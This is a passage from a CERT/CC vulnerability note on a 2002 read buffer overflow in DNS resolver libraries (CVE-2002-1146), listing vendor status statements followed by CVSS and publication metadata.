Nixu\n\nNotified: September 24, 2002 Updated: October 14, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nNixu NameSurfer itself does not contain any parts of the resolver library being discussed, nor does it call the res_* functions directly. However, parts of NameSurfer are dynamically linked with the resolver library on the DNS server machine. Therefore, if the underlying system is vulnerable, the vulnerability propagates also to NameSurfer.\n\nNixu recommends that the resolver on the DNS server running NameSurfer is upgraded according to ISC's advisory as published by CERT. No further actions are required.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ SGI\n\nNotified: August 15, 2002 Updated: August 23, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSGI uses nsd (UNS name service daemon) as a resolver and it does not appear to be vulnerable as it does not use any of the res_* functions.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Secure Computing Corporation\n\nUpdated: October 16, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nSIDEWINDER(tm) FIREWALL & VPN (all releases including SIDEWINDER APPLIANCE)\n\nNot Vulnerable \n \nAs part of Sidewinder(tm)'s defense in depth architecture, DNS queries are sandboxed by SecureOS(tm)'s patented Type Enforcement technology. Faults in the resolver library cannot cause a comprimise of the Sidewinder(tm). However, since a Bind 8 caching server can still pass this attack along to vulnerable resolvers, Sidewinder(tm) users who wish to protect vulnerable resolvers behind their firewall from attack should upgrade to version 5.2.1.05, which replaces Bind 8 with Bind 9. \n \nCustomers should contact Customer Service to obtain version 5.2.1.05. \n \nGauntlet and e-ppliance \n \nBoth Gauntlet Software and Gauntlet e-ppliance utilize the Bind version that ships with Solaris 8. Please see Solaris 8 response to this vulnerability to assess applicability of any potential DOS risk. Secure Computing will test and make recommendations to customers regarding any potential software changes, if any, published by Sun Microsystems.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ djbdns\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\ndjbdns does not have these bugs. djbdns has never used any BIND-derived code. djbdns, including the djbdns client library, is covered by a $500 security guarantee. The djbdns client library is free for use by other packages in place of BIND's libresolv. See <http://cr.yp.to/djbdns.html>.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ 3Com\n\nUpdated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ AT&T\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Alcatel\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ BlueCat Networks\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Check Point\n\nNotified: August 15, 2002 Updated: April 15, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n<<http://www.checkpoint.com/techsupport/documentation/smartdefense/2002/cpai-2002-09.html>>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Cisco Systems Inc.\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ Cray Inc.\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nCray Inc. may be vulnerable and has opened spr 723016 to track this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Data General\n\nNotified: August 15, 2002 Updated: September 24, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ F5 Networks\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Infoblox\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Intel\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ KTH Kerberos\n\nNotified: August 23, 2002 Updated: August 24, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Lotus Software\n\nNotified: September 24, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ __ NEC Corporation\n\nNotified: August 15, 2002 Updated: October 16, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nsent on October 4, 2002\n\n[Server Products] \nOn investigation \n \n[Router Products] \n\n\n * IX 5000 Series\n\\- is NOT vulnerable. \n\n\n * IX 1000/2000 Series\n\\- is NOT vulnerable. \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Network Appliance\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Nominum\n\nNotified: August 15, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ OpenBSD\n\nNotified: August 15, 2002 Updated: August 15, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ OpenLDAP\n\nNotified: August 23, 2002 Updated: August 24, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Oracle Corporation\n\nNotified: October 01, 2002 Updated: October 01, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Sendmail\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Sequent\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Sony Corporation\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ The SCO Group\n\nNotified: August 15, 2002 Updated: September 24, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Unisphere Networks\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Unisys\n\nNotified: August 15, 2002 Updated: October 03, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\n### __ Wind River Systems Inc.\n\nNotified: August 15, 2002 Updated: August 15, 2002 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23738331 Feedback>).\n\nView all 58 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n[](<>)\n\n### Acknowledgements\n\nThe CERT/CC thanks Mark Andrews of ISC for reporting this vulnerability. \n\nThis document was written by Art Manion. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1146](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1146>) \n---|--- \n**Severity Metric:****** | 19.04 \n**Date Public:** | 2002-10-01 \n**Date First Published:** | 2002-10-01 \n**Date Last Updated: ** | 2003-04-15 19:39 UTC \n**Document Revision: ** | 40 \n", "modified": "2003-04-15T19:39:00", "published": "2002-10-01T00:00:00", "id": "VU:738331", "href": "https://www.kb.cert.org/vuls/id/738331", "type": "cert", "title": "Domain Name System (DNS) resolver libraries vulnerable to read buffer overflow", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
